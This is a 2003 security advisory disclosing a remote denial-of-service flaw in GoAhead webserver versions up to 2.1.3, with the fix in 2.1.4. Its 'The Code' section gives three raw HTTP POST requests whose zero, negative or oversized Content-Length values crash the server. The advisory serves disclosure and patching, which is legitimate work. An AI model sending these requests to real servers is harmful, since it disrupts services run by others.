#######################################################################

                             Luigi Auriemma

Application: Goahead webserver
             http://www.goahead.com/webserver/webserver.htm
Versions:    <= 2.1.3
Platforms:   All the platforms supported by the server
Bugs:        Denial of Service
Date:        22 Sep 2003
Author:      Luigi Auriemma
             e-mail: aluigi@autistici.org
             web:    aluigi.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


Goahead webserver is an embedded OpenSource server that can be build on
a lot of systems (CE, Ecos, GNU/Linux, Lynx, MacOS, NW, QNX4, VXWORKS,
Win32 and others).
It is supported by a lot of companies that use it for their projects
and it is also used like "base" for other webservers, furthermore it
has been developed for be very tiny and to run on embedded systems.


#######################################################################

======
2) Bug
======


A POST request with a Content-Lenght parameter equal or less than 0
causes a remote Denial of Service.
Possible code execution not tested. (I think yes but I have not tested
it).


#######################################################################


===========
3) The Code
===========


---
POST /home.asp HTTP/1.0
Content-Length: 0
---
POST /home.asp HTTP/1.0
Content-Length: -100
---
POST /home.asp HTTP/1.0
Content-Length: 9999999999
---


#######################################################################

======
4) Fix
======


Versions from 2.1.4 are fixed


#######################################################################